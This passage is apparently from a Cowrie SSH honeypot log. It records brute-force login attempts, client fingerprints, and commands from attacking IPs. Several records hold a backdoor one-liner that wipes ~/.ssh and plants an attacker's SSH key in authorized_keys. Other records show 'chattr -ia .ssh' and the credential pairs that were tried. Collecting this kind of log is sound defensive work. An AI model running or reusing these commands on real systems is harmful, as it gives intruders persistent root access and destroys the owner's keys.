{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:02:21.451024Z","src_ip":"212.227.235.229","session":"18c683958225"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:02:22.235312Z","src_ip":"212.227.235.229","session":"18c683958225"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:22.236083Z","src_ip":"212.227.235.229","session":"18c683958225"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41750,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9443de08ac2","protocol":"ssh","message":"New connection: 212.227.235.229:41750 (1.2.3.4:22) [session: d9443de08ac2]","sensor":"my-vps","timestamp":"2025-08-31T05:02:22.482548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:02:22.483220Z","src_ip":"212.227.235.229","session":"d9443de08ac2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:02:22.740153Z","src_ip":"212.227.235.229","session":"d9443de08ac2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:02:23.808246Z","src_ip":"212.227.235.229","session":"d9443de08ac2"}
{"eventid":"cowrie.session.closed","duration":"36.1","message":"Connection lost after 36.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:23.966233Z","src_ip":"212.227.235.229","session":"8cdcd62d8286"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:25.067601Z","src_ip":"212.227.235.229","session":"d9443de08ac2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33928,"dst_ip":"1.2.3.4","dst_port":22,"session":"d66fab5c0710","protocol":"ssh","message":"New connection: 212.227.125.160:33928 (1.2.3.4:22) [session: d66fab5c0710]","sensor":"my-vps","timestamp":"2025-08-31T05:02:25.173402Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41762,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2f41041b5bc","protocol":"ssh","message":"New connection: 212.227.235.229:41762 (1.2.3.4:22) [session: d2f41041b5bc]","sensor":"my-vps","timestamp":"2025-08-31T05:02:25.339026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:02:25.339678Z","src_ip":"212.227.235.229","session":"d2f41041b5bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:02:25.603748Z","src_ip":"212.227.235.229","session":"d2f41041b5bc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:02:27.434610Z","src_ip":"212.227.235.229","session":"d2f41041b5bc"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:27.700757Z","src_ip":"212.227.235.229","session":"18c683958225"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:27.701605Z","src_ip":"212.227.235.229","session":"d2f41041b5bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47222,"dst_ip":"1.2.3.4","dst_port":22,"session":"436b1ec249ca","protocol":"ssh","message":"New connection: 212.227.235.229:47222 (1.2.3.4:22) [session: 436b1ec249ca]","sensor":"my-vps","timestamp":"2025-08-31T05:02:28.110544Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:02:28.115796Z","src_ip":"212.227.235.229","session":"436b1ec249ca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:02:28.382269Z","src_ip":"212.227.235.229","session":"436b1ec249ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46954,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf975865f535","protocol":"ssh","message":"New connection: 212.227.235.229:46954 (1.2.3.4:22) [session: bf975865f535]","sensor":"my-vps","timestamp":"2025-08-31T05:02:28.473323Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:02:28.480895Z","src_ip":"212.227.235.229","session":"bf975865f535"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:02:28.723168Z","src_ip":"212.227.235.229","session":"bf975865f535"}
{"eventid":"cowrie.login.success","username":"root","password":"101010","message":"login attempt [root/101010] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:02:29.233179Z","src_ip":"212.227.235.229","session":"bf975865f535"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1234","message":"login attempt [user1/user1234] failed","sensor":"my-vps","timestamp":"2025-08-31T05:02:29.457456Z","src_ip":"212.227.235.229","session":"436b1ec249ca"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:02:29.545011Z","src_ip":"212.227.235.229","session":"bf975865f535"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:02:29.545675Z","src_ip":"212.227.235.229","session":"bf975865f535"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:02:29.547088Z","src_ip":"212.227.235.229","session":"bf975865f535"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:29.725595Z","src_ip":"212.227.235.229","session":"bf975865f535"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:02:30.047939Z","src_ip":"212.227.235.229","session":"bf975865f535"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:02:30.048650Z","src_ip":"212.227.235.229","session":"bf975865f535"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:02:30.231581Z","src_ip":"212.227.235.229","session":"bf975865f535"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:30.232462Z","src_ip":"212.227.235.229","session":"bf975865f535"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47350,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa2fa9b0fbfe","protocol":"ssh","message":"New connection: 212.227.235.229:47350 (1.2.3.4:22) [session: aa2fa9b0fbfe]","sensor":"my-vps","timestamp":"2025-08-31T05:02:30.474605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:02:30.480273Z","src_ip":"212.227.235.229","session":"aa2fa9b0fbfe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:02:30.727706Z","src_ip":"212.227.235.229","session":"aa2fa9b0fbfe"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:30.735947Z","src_ip":"212.227.235.229","session":"436b1ec249ca"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:02:31.277420Z","src_ip":"212.227.235.229","session":"aa2fa9b0fbfe"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:32.473520Z","src_ip":"212.227.235.229","session":"aa2fa9b0fbfe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47844,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6112b597220","protocol":"ssh","message":"New connection: 212.227.235.229:47844 (1.2.3.4:22) [session: c6112b597220]","sensor":"my-vps","timestamp":"2025-08-31T05:02:32.526574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:02:32.527648Z","src_ip":"212.227.235.229","session":"c6112b597220"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:02:32.727807Z","src_ip":"212.227.235.229","session":"c6112b597220"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:02:33.279867Z","src_ip":"212.227.235.229","session":"c6112b597220"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:33.485282Z","src_ip":"212.227.235.229","session":"c6112b597220"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:33.486798Z","src_ip":"212.227.235.229","session":"bf975865f535"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37152,"dst_ip":"1.2.3.4","dst_port":22,"session":"d268af0a57eb","protocol":"ssh","message":"New connection: 212.227.235.229:37152 (1.2.3.4:22) [session: d268af0a57eb]","sensor":"my-vps","timestamp":"2025-08-31T05:02:35.410484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:02:35.411406Z","src_ip":"212.227.235.229","session":"d268af0a57eb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:02:35.683759Z","src_ip":"212.227.235.229","session":"d268af0a57eb"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:02:36.187061Z","src_ip":"212.227.125.160","session":"d66fab5c0710"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 